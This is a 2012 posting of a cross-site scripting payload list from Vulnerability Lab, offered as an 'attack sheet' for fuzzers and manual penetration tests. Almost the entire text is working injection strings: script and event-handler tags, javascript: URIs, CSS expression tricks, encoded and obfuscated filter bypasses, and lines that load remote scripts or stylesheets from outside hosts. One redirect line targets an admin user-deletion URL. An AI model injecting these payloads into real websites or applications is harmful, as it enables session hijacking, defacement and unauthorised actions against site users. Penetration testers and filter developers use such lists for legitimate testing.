Cross Site Scripting Payloads
Posted Apr 24, 2012
Site vulnerability-lab.com

Vulnerability Lab has produced a large number of cross-site scripting payloads that can be used with fuzzers for automated scanning, etc.

tags | paper, xss, fuzzer
SHA-256 | 71078b2183d9cc07ac1636ddcb7060fb73257b6ebaedff466a4e3c1617e9defc


Information:
Many people have asked us for our cross site scripting pentest sheet for use with a fuzzer or their own scripts. For
good results, you can use the following list with automated scripts or software, or for manual pentesting. This
list goes out to all friends, nerds, pentesters & exploiters. Please continue the list and we will update it soon.

Note: This is a technical attack sheet for cross site penetration tests.



Cross Site Scripting Strings with TAG:

<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
<SCRIPT>document.cookie=true;</SCRIPT>
<IMG SRC="jav ascript:document.cookie=true;">
<IMG SRC="javascript:document.cookie=true;">
<IMG SRC="  javascript:document.cookie=true;">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
<SCRIPT>document.cookie=true;//<</SCRIPT>
<SCRIPT <B>document.cookie=true;</SCRIPT>
<IMG SRC="javascript:document.cookie=true;">
<iframe src="javascript:document.cookie=true;>
<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>
</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
<BODY BACKGROUND="javascript:document.cookie=true;">
<BODY ONLOAD=document.cookie=true;>
<IMG DYNSRC="javascript:document.cookie=true;">
<IMG LOWSRC="javascript:document.cookie=true;">
<BGSOUND SRC="javascript:document.cookie=true;">
<BR SIZE="&{document.cookie=true}">
<LAYER SRC="javascript:document.cookie=true;"></LAYER>
<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting
¼script¾document.cookie=true;¼/script¾
<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
<TABLE BACKGROUND="javascript:document.cookie=true;">
<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
<DIV STYLE="width: expression(document.cookie=true);">
<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)">
<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)">
exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'>
<STYLE TYPE="text/javascript">document.cookie=true;</STYLE>
<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A>
<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE>
<SCRIPT>document.cookie=true;</SCRIPT>
<BASE HREF="javascript:document.cookie=true;//">
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
<a href="javascript#document.cookie=true;">
<div onmouseover="document.cookie=true;">
<img src="javascript:document.cookie=true;">
<img dynsrc="javascript:document.cookie=true;">
<input type="image" dynsrc="javascript:document.cookie=true;">
<bgsound src="javascript:document.cookie=true;">
&<script>document.cookie=true;</script>
&{document.cookie=true;};
<img src=&{document.cookie=true;};>
<link rel="stylesheet" href="javascript:document.cookie=true;">
<img src="mocha:document.cookie=true;">
<img src="livescript:document.cookie=true;">
<a href="about:<script>document.cookie=true;</script>">
<body onload="document.cookie=true;">
<div style="background-image: url(javascript:document.cookie=true;);">
<div style="behaviour: url([link to code]);">
<div style="binding: url([link to code]);">
<div style="width: expression(document.cookie=true;);">
<style type="text/javascript">document.cookie=true;</style>
<object classid="clsid:..." codebase="javascript:document.cookie=true;">
<style><!--</style><script>document.cookie=true;//--></script>
<<script>document.cookie=true;</script>
<script>document.cookie=true;//--></script>
<!-- -- --><script>document.cookie=true;</script><!-- -- -->
<img src="blah"onmouseover="document.cookie=true;">
<img src="blah>" onmouseover="document.cookie=true;">
<xml src="javascript:document.cookie=true;">
<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>



Cross Site Scripting Strings with close TAG:

>"<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
>"<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
>"<SCRIPT>document.cookie=true;</SCRIPT>
>"<IMG SRC="jav ascript:document.cookie=true;">
>"<IMG SRC="javascript:document.cookie=true;">
>"<IMG SRC="  javascript:document.cookie=true;">
>"<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
>"<SCRIPT>document.cookie=true;//<</SCRIPT>
>"<SCRIPT <B>document.cookie=true;</SCRIPT>
>"<IMG SRC="javascript:document.cookie=true;">
>"<iframe src="javascript:document.cookie=true;>
>"<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>
>"</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
>"<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
>"<BODY BACKGROUND="javascript:document.cookie=true;">
>"<BODY ONLOAD=document.cookie=true;>
>"<IMG DYNSRC="javascript:document.cookie=true;">
>"<IMG LOWSRC="javascript:document.cookie=true;">
>"<BGSOUND SRC="javascript:document.cookie=true;">
>"<BR SIZE="&{document.cookie=true}">
>"<LAYER SRC="javascript:document.cookie=true;"></LAYER>
>"<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
>"<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting
>"¼script¾document.cookie=true;¼/script¾
>"<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
>"<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
>"<TABLE BACKGROUND="javascript:document.cookie=true;">
>"<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
>"<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
>"<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
>"<DIV STYLE="width: expression(document.cookie=true);">
>"<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
>"<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)">
>"<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)">
>"exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'>
>"<STYLE TYPE="text/javascript">document.cookie=true;</STYLE>
>"<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A>
>"<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE>
>"<SCRIPT>document.cookie=true;</SCRIPT>
>"<BASE HREF="javascript:document.cookie=true;//">
>"<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
>"<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
>"<XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
>"<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
>"<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
>"<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
>"<a href="javascript#document.cookie=true;">
>"<div onmouseover="document.cookie=true;">
>"<img src="javascript:document.cookie=true;">
>"<img dynsrc="javascript:document.cookie=true;">
>"<input type="image" dynsrc="javascript:document.cookie=true;">
>"<bgsound src="javascript:document.cookie=true;">
>"&<script>document.cookie=true;</script>
>"&{document.cookie=true;};
>"<img src=&{document.cookie=true;};>
>"<link rel="stylesheet" href="javascript:document.cookie=true;">
>"<img src="mocha:document.cookie=true;">
>"<img src="livescript:document.cookie=true;">
>"<a href="about:<script>document.cookie=true;</script>">
>"<body onload="document.cookie=true;">
>"<div style="background-image: url(javascript:document.cookie=true;);">
>"<div style="behaviour: url([link to code]);">
>"<div style="binding: url([link to code]);">
>"<div style="width: expression(document.cookie=true;);">
>"<style type="text/javascript">document.cookie=true;</style>
>"<object classid="clsid:..." codebase="javascript:document.cookie=true;">
>"<style><!--</style><script>document.cookie=true;//--></script>
>"<<script>document.cookie=true;</script>
>"<script>document.cookie=true;//--></script>
>"<!-- -- --><script>document.cookie=true;</script><!-- -- -->
>"<img src="blah"onmouseover="document.cookie=true;">
>"<img src="blah>" onmouseover="document.cookie=true;">
>"<xml src="javascript:document.cookie=true;">
>"<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
>"<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>



Cross Site Scripting Strings with negative value & TAG:

-1<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
-1<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
-1<SCRIPT>document.cookie=true;</SCRIPT>
-1<IMG SRC="jav ascript:document.cookie=true;">
-1<IMG SRC="javascript:document.cookie=true;">
-1<IMG SRC="  javascript:document.cookie=true;">
-1<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
-1<SCRIPT>document.cookie=true;//<</SCRIPT>
-1<SCRIPT <B>document.cookie=true;</SCRIPT>
-1<IMG SRC="javascript:document.cookie=true;">
-1<iframe src="javascript:document.cookie=true;>
-1<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>
-1</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
-1<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
-1<BODY BACKGROUND="javascript:document.cookie=true;">
-1<BODY ONLOAD=document.cookie=true;>
-1<IMG DYNSRC="javascript:document.cookie=true;">
-1<IMG LOWSRC="javascript:document.cookie=true;">
-1<BGSOUND SRC="javascript:document.cookie=true;">
-1<BR SIZE="&{document.cookie=true}">
-1<LAYER SRC="javascript:document.cookie=true;"></LAYER>
-1<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
-1<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting
-1¼script¾document.cookie=true;¼/script¾
-1<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
-1<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
-1<TABLE BACKGROUND="javascript:document.cookie=true;">
-1<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
-1<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
-1<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
-1<DIV STYLE="width: expression(document.cookie=true);">
-1<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
-1<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)">
-1<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)">
-1exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'>
-1<STYLE TYPE="text/javascript">document.cookie=true;</STYLE>
-1<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A>
-1<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE>
-1<SCRIPT>document.cookie=true;</SCRIPT>
-1<BASE HREF="javascript:document.cookie=true;//">
-1<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
-1<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
-1<XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
-1<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
-1<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
-1<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
-1<a href="javascript#document.cookie=true;">
-1<div onmouseover="document.cookie=true;">
-1<img src="javascript:document.cookie=true;">
-1<img dynsrc="javascript:document.cookie=true;">
-1<input type="image" dynsrc="javascript:document.cookie=true;">
-1<bgsound src="javascript:document.cookie=true;">
-1&<script>document.cookie=true;</script>
-1&{document.cookie=true;};
-1<img src=&{document.cookie=true;};>
-1<link rel="stylesheet" href="javascript:document.cookie=true;">
-1<img src="mocha:document.cookie=true;">
-1<img src="livescript:document.cookie=true;">
-1<a href="about:<script>document.cookie=true;</script>">
-1<body onload="document.cookie=true;">
-1<div style="background-image: url(javascript:document.cookie=true;);">
-1<div style="behaviour: url([link to code]);">
-1<div style="binding: url([link to code]);">
-1<div style="width: expression(document.cookie=true;);">
-1<style type="text/javascript">document.cookie=true;</style>
-1<object classid="clsid:..." codebase="javascript:document.cookie=true;">
-1<style><!--</style><script>document.cookie=true;//--></script>
-1<<script>document.cookie=true;</script>
-1<script>document.cookie=true;//--></script>
-1<!-- -- --><script>document.cookie=true;</script><!-- -- -->
-1<img src="blah"onmouseover="document.cookie=true;">
-1<img src="blah>" onmouseover="document.cookie=true;">
-1<xml src="javascript:document.cookie=true;">
-1<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
-1<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>


Cross Site Scripting Strings Restriction Bypass Mail:

>"<iframe src=http://vulnerability-lab.com/>@gmail.com
>"<script>alert(document.cookie)</script><div style="1@gmail.com
>"<script>alert(document.cookie)</script>@gmail.com

<iframe src=http://vulnerability-lab.com/>@gmail.com
<script>alert(document.cookie)</script><div style="1@gmail.com
<script>alert(document.cookie)</script>@gmail.com


Cross Site Scripting Strings Restriction Bypass Phone:

+49/>"<iframe src=http://vulnerability-lab.com>1337
"><iframe src='' onload=alert('mphone')>
<iframe src=http://vulnerability-lab.com>1337+1


Cross Site Scripting Strings Restriction Bypass Obfuscation

>“<ScriPt>ALeRt("VlAb")</scriPt>
>"<IfRaMe sRc=hTtp://vulnerability-lab.com></IfRaMe>


Cross Site Scripting Strings Restriction Bypass String to Charcode

<html><body>
<button.onclick="alert(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,
101,114,116,40,34,67,114,111,115,115,83,105,116,101,83,99,114,105,112,116,105,1
10,103,64,82,69,77,79,86,69,34,41,60,47,115,99,114,105,112,116,62));">String:fr
om.Char.Code</button></body></html>


';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//\";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))</SCRIPT>
'';!--"<CrossSiteScripting>=&{()}



Cross Site Scripting Strings Restriction Bypass encoded frame url

%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%43%72%6F
%73%73%53%69%74%65%53%63%72%69%70%74%69%6E%67%32%22%29%3C%2F
%73%63%72%69%70%74%3E



Cross Site Scripting Strings via Console:

set vlan name 1337 <script>alert(document.cookie)</script>
set system name <iframe src=http://www.vulnerability-lab.com>
set system location "><iframe src=a onload=alert("VL") <
set system contact <script>alert('VL')</script>

insert <script>alert(document.cookie)</script>
add <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js></SCRIPT>'"-->
add user <script>alert(document.cookie)</script> <script>alert(document.cookie)</script>@gmail.com

add topic <iframe src=http://www.vulnerability-lab.com>
add name <script>alert('VL')</script>

perl -e 'print "<IMG SRC=java\0script:alert(\"CrossSiteScripting\")>";' > out
perl -e 'print "<SCR\0IPT>alert(\"CrossSiteScripting\")</SCR\0IPT>";' > out

<!--[if gte IE 4]> <SCRIPT>alert('CrossSiteScripting');</SCRIPT> <![endif]-->




Cross Site Scripting Strings on per line validation applications:

<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
V
L
A
B
'
)
"
>



Cross Site Scripting Strings Embed:

<EMBED SRC="http://vulnerability-lab.com/CrossSiteScripting.swf" AllowScriptAccess="always"></EMBED>

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>



Cross Site Scripting Strings Action Script:

<object type="application/x-shockwave-flash" data="http://www.vulnerability-lab.com/hack.swf" width="300" height="300">
<param name="movie" value="http://www.subhohalder.com/xysecteam.swf" />
<param name="quality" value="high" />
<param name="scale" value="noscale" />
<param name="salign" value="LT" />
<param name="allowScriptAccess" value="always" />
<param name="menu" value="false" />
</object>




<SCRIPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js></SCRIPT>
<<SCRIPT>alert("CrossSiteScripting");//<</SCRIPT>
<SCRIPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js?<B>
<SCRIPT SRC=//vulnerability-lab.com/.js>
<SCRIPT>a=/CrossSiteScripting/ alert(a.source)</SCRIPT>
<SCRIPT a=">" SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT>
</TITLE><SCRIPT>alert("CrossSiteScripting");</SCRIPT>


<IMG SRC="javascript:alert('CrossSiteScripting');">
<IMG SRC=javascript:alert('CrossSiteScripting')>
<IMG SRC=JaVaScRiPt:alert('CrossSiteScripting')>
<IMG SRC=javascript:alert("CrossSiteScripting")>
<IMG SRC=`javascript:alert("RM'CrossSiteScripting'")`>
<IMG """><SCRIPT>alert("CrossSiteScripting")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC="jav ascript:alert('CrossSiteScripting');">
<IMG SRC="jav&#x09;ascript:alert('CrossSiteScripting');">
<IMG SRC="jav&#x0A;ascript:alert('CrossSiteScripting');">
<IMG SRC="jav&#x0D;ascript:alert('CrossSiteScripting');">
<IMG SRC="  javascript:alert('CrossSiteScripting');">
<IMG SRC="javascript:alert('CrossSiteScripting')"
<IMG DYNSRC="javascript:alert('CrossSiteScripting')">
<IMG LOWSRC="javascript:alert('CrossSiteScripting')">
<IMG SRC='vbscript:msgbox("CrossSiteScripting")'>
<IMG SRC="mocha:[code]">
<IMG SRC="livescript:[code]">


<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('CrossSiteScripting');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('CrossSiteScripting');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('CrossSiteScripting');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=jAvAsCriPt:aLeRt('CroSsSiteScrIpting');">
<META HTTP-EQUIV="Link" Content="<http://vulnerability-lab.com/CrossSiteScripting.css>; REL=stylesheet">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('CrossSiteScripting')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('CrossSiteScripting');+ADw-/SCRIPT+AD4-


<OBJECT TYPE="text/x-scriptlet" DATA="http://vulnerability-lab.com/scriptlet.html"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('CrossSiteScripting')></OBJECT>


<STYLE>@im\port'\ja\vasc\ript:alert("CrossSiteScripting")';</STYLE>
<STYLE>@import'http://vulnerability-lab.com/CrossSiteScripting.css';</STYLE>
<STYLE TYPE="text/javascript">alert('CrossSiteScripting');</STYLE>
<STYLE>.CrossSiteScripting{background-image:url("javascript:alert('CrossSiteScripting')");}</STYLE><A CLASS=CrossSiteScripting></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('CrossSiteScripting')")}</STYLE>
<STYLE>li {list-style-image: url("javascript:alert('CrossSiteScripting')");}</STYLE><UL><LI>CrossSiteScripting
<STYLE>BODY{-moz-binding:url("http://vulnerability-lab.com/CrossSiteScriptingmoz.xml#CrossSiteScripting")}</STYLE>


<DIV STYLE="background-image: url(javascript:alert('CrossSiteScripting'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(javascript:alert('CrossSiteScripting'))">
<DIV STYLE="width: expression(alert('CrossSiteScripting'));">

<LAYER SRC="http://vulnerability-lab.com/script.html"></LAYER>
<LINK REL="stylesheet" HREF="javascript:alert('CrossSiteScripting');">
<LINK REL="stylesheet" HREF="http://vulnerability-lab.com/CrossSiteScripting.css">

<BODY BACKGROUND="javascript:alert('CrossSiteScripting')">
<BODY ONLOAD=alert('CrossSiteScripting')>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("CrossSiteScripting")>
<iframe src=http://vulnerability-lab.com/index.html <


<TABLE BACKGROUND="javascript:alert('CrossSiteScripting')">
<TABLE><TD BACKGROUND="javascript:alert('CrossSiteScripting')">

<BGSOUND SRC="javascript:alert('CrossSiteScripting');">
<BR SIZE="&{alert('CrossSiteScripting')}">


<A HREF="http://server.com/">CrossSiteScripting</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">CrossSiteScripting</A>
<A HREF="http://1113982867/">CrossSiteScripting</A>
<A HREF="javascript:document.location='http://www.vulnerability-lab.com/'">CrossSiteScripting</A>

<BASE HREF="javascript:alert('CrossSiteScripting');//">

\";alert('CrossSiteScripting');//

<INPUT TYPE="IMAGE" SRC="javascript:alert('CrossSiteScripting');">




<CrossSiteScripting STYLE="behavior: url(CrossSiteScripting.htc);">


¼script¾alert(¢CrossSiteScripting¢)¼/script¾



<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(alert('CrossSiteScripting'))">
<CrossSiteScripting STYLE="CrossSiteScripting:expression(alert('CrossSiteScripting'))"> exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*"); CrossSiteScripting:ex&#x2F;*CrossSiteScripting*//*/*/pression(alert("CrossSiteScripting"))'>





a="get";
b="URL(\"";
c="javascript:";
d="alert('CrossSiteScripting');\")";
eval(v+l+a+b);

<HTML xmlns:CrossSiteScripting>
<?import namespace="CrossSiteScripting" implementation="http://ha.ckers.org/CrossSiteScripting.htc">
<CrossSiteScripting:CrossSiteScripting>CrossSiteScripting</CrossSiteScripting:CrossSiteScripting>

<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('CrossSiteScripting');">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>


<XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:alert('CrossSiteScripting')"></B></I></XML>
<SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>


<XML SRC="CrossSiteScriptingtest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>alert("CrossSiteScripting")</SCRIPT>">
</BODY></HTML>

<SCRIPT SRC="http://vulnerability-lab.com/CrossSiteScripting.jpg"></SCRIPT>

<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js></SCRIPT>'"-->

<? echo('<SCR)';
echo('IPT>alert("CrossSiteScripting")</SCRIPT>'); ?>

<IMG SRC="http://www.vulnerability-lab.com/file.php?variables=malicious">

Redirect 302 /vlab.jpg http://vulnerability-lab.com/admin.asp&deleteuser




%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%64%65%3E

&#x3C;&#x69;&#x66;&#x72;&#x61;&#x6D;&#x65;&#x20;&#x73;&#x72;&#x63;&#x3D;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x74;&#x65;&#x73;&#x74;&#x2E;&#x64;&#x65;&#x3E;

&#60&#105&#102&#114&#97&#109&#101&#32&#115&#114&#99&#61&#104&#116&#116&#112&#58&#47&#47&#116&#101&#115&#116&#46&#100&#101&#62

PGlmcmFtZSBzcmM9aHR0cDovL3Rlc3QuZGU+